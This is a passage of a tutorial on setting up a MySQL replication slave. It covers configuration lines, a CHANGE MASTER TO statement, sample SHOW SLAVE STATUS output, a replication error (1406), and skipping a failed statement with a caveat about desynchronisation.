sudo cp /etc/my.cnf /etc/my.cnf.orig
Step 4: configure the slave. I covered server-id in Step 3 of the master configuration; the master was assigned server-id 1, so now assign 2 to the slave in the [mysqld] section:
server-id = 2  
Step 5: add the following lines right after server-id = 2:
relay-log               = /var/log/mysql/mysql-relay-bin.log  
log_bin                 = /var/log/mysql/mysql-bin.log  
binlog_do_db            = newdatabase  
Step 6: restart the MySQL service to apply the changes:
sudo service mysqld restart
Step 7: next, open a MySQL shell and enter the following:
CHANGE MASTER TO MASTER_HOST='10.10.10.1', MASTER_PORT=3307, MASTER_USER='slave_user', MASTER_PASSWORD='password', MASTER_LOG_FILE='mysql-bin.003894', MASTER_LOG_POS=44121282;
This statement does the following:
  • It tells the current server that it is a slave of the MySQL master at IP 10.10.10.1.
  • It provides the credentials used to log in to the master.
  • Finally, it tells the slave where to start copying from: the master’s log file and position.
Step 8: activate the slave:
START SLAVE;  
Step 9: now check whether the slave you just configured is actually working. Open a MySQL shell and run:
mysql> show slave status\G;  
*************************** 1. row ***************************
               Slave_IO_State: Waiting for master to send event
                  Master_Host: 10.10.10.1
                  Master_User: slave_user
                  Master_Port: 3307
                Connect_Retry: 60
              Master_Log_File: mysql-bin.003908
          Read_Master_Log_Pos: 70419921
               Relay_Log_File: mysqld-relay-bin.000028
                Relay_Log_Pos: 70420084
        Relay_Master_Log_File: mysql-bin.003908
             Slave_IO_Running: Yes
            Slave_SQL_Running: Yes
              Replicate_Do_DB: 
          Replicate_Ignore_DB: 
           Replicate_Do_Table: 
       Replicate_Ignore_Table: 
      Replicate_Wild_Do_Table: 
  Replicate_Wild_Ignore_Table: 
                   Last_Errno: 0
                   Last_Error: 
                 Skip_Counter: 0
          Exec_Master_Log_Pos: 70419921
              Relay_Log_Space: 70420305
              Until_Condition: None
               Until_Log_File: 
                Until_Log_Pos: 0
           Master_SSL_Allowed: No
           Master_SSL_CA_File: 
           Master_SSL_CA_Path: 
              Master_SSL_Cert: 
            Master_SSL_Cipher: 
               Master_SSL_Key: 
        Seconds_Behind_Master: 0
Master_SSL_Verify_Server_Cert: No  
                Last_IO_Errno: 0
                Last_IO_Error: 
               Last_SQL_Errno: 0
               Last_SQL_Error: 
  Replicate_Ignore_Server_Ids: 
             Master_Server_Id: 1
                  Master_UUID: 97fcc20f-9ed8-11e6-9eaa-0025903d1878
             Master_Info_File: /home/mysql/data/master.info
                    SQL_Delay: 0
          SQL_Remaining_Delay: NULL
      Slave_SQL_Running_State: Slave has read all relay log; waiting for the slave I/O thread to update it
           Master_Retry_Count: 86400
                  Master_Bind: 
      Last_IO_Error_Timestamp: 
     Last_SQL_Error_Timestamp: 
               Master_SSL_Crl: 
           Master_SSL_Crlpath: 
           Retrieved_Gtid_Set: 
            Executed_Gtid_Set: 
                Auto_Position: 0
1 row in set (0.00 sec)

ERROR:  
No query specified

mysql>  

Errors That Can Occur

Replication between the MySQL master and the MySQL slave can be interrupted by data errors. Common error codes include 1062, 1452, 1050, 1146, 1356, 1054, 1060, and 1406:
mysql> show slave status\G;  
*************************** 1. row ***************************
               Slave_IO_State: Waiting for master to send event
                  Master_Host: 10.10.10.1
                  Master_User: slave_user
                  Master_Port: 3307
                Connect_Retry: 60
              Master_Log_File: mysql-bin.003895
          Read_Master_Log_Pos: 1965103
               Relay_Log_File: mysqld-relay-bin.000394
                Relay_Log_Pos: 83593238
        Relay_Master_Log_File: mysql-bin.003892
             Slave_IO_Running: Yes
            Slave_SQL_Running: No
              Replicate_Do_DB: 
          Replicate_Ignore_DB: 
           Replicate_Do_Table: 
       Replicate_Ignore_Table: 
      Replicate_Wild_Do_Table: 
  Replicate_Wild_Ignore_Table: 
                   Last_Errno: 1406
                   Last_Error: Error 'Data too long for column 'id1' at row 1' on query. Default database: 'newdatabase'
                 Skip_Counter: 0
          Exec_Master_Log_Pos: 83593075
              Relay_Log_Space: 316678540
              Until_Condition: None
               Until_Log_File: 
                Until_Log_Pos: 0
           Master_SSL_Allowed: No
           Master_SSL_CA_File: 
           Master_SSL_CA_Path: 
              Master_SSL_Cert: 
            Master_SSL_Cipher: 
               Master_SSL_Key: 
        Seconds_Behind_Master: NULL
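When replication stops on an error like the 1406 above, a common (if blunt) way to resume is to skip the offending statement on the slave and restart the slave threads. Note that skipping statements can leave the slave out of sync with the master, so investigate the root cause first:

STOP SLAVE;
SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;
START SLAVE;
SHOW SLAVE STATUS\G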
